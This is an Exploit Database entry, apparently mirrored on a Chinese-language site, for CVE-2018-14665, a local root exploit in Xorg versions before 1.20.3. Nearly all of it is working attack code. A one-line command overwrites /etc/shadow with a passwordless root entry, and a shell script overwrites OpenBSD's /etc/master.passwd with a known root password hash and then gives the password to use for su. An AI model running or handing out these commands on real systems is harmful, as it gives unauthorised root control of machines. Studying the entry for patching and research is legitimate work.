xorg-x11-server < 1.20.3 - Local Privilege Escalation

• Exploit Database
• 124 阅读

• 作者： Hacker Fantastic
  日期： 2018-10-25
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/45697/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  #CVE-2018-14665 - a LPE exploit via http://X.orgfits in a tweet   cd /etc; Xorg -fp "root::16431:0:99999:7:::"-logfile shadow:1;su   Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.           #!/bin/sh # local privilege escalation in X11 currently # unpatched in OpenBSD 6.4 stable - exploit # uses cve-2018-14665 to overwrite files as root. # Impacts Xorg 1.19.0 - 1.20.2 which ships setuid # and vulnerable in default OpenBSD. # # - https://hacker.house echo [+] OpenBSD 6.4-stable local root exploit cd /etc Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 & sleep 5 pkill Xorg echo [-] dont forget to mv and chmod /etc/master.passwd.old back echo [+] type 'Password1' and hit enter for root su -     EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850